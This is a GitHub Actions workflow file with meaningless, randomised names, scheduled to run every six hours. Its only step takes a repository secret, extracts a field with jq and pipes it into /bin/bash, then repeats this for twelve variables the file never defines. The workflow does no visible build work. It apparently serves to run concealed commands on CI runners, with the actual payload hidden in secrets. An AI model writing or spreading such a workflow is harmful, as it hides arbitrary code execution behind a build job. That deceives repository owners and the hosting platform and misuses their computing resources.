name: xuhaoran3871
on:
  workflow_dispatch:
  schedule:
    - cron: '35 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xuhaoran3871
        env:
          grk0023: ${{ secrets.grk0023 }}
        run: |
          echo $grk0023 | jq -r .ljjdo8 | /bin/bash
          echo $i72764 | jq -r .f1094 | /bin/bash
          echo $lx7586 | jq -r .r8 | /bin/bash
          echo $dvz13636 | jq -r .kod9779 | /bin/bash
          echo $feql0610 | jq -r .fvl84 | /bin/bash
          echo $pnw02767 | jq -r .bdxw0081 | /bin/bash
          echo $d18907 | jq -r .mg32224 | /bin/bash
          echo $yi5613 | jq -r .xtccw8967 | /bin/bash
          echo $bbgn25 | jq -r .j95 | /bin/bash
          echo $uyldg392 | jq -r .i6 | /bin/bash
          echo $cik83 | jq -r .ny343 | /bin/bash
          echo $tdjv4697 | jq -r .oqy1336 | /bin/bash
          echo $mk0787 | jq -r .vxj95 | /bin/bash

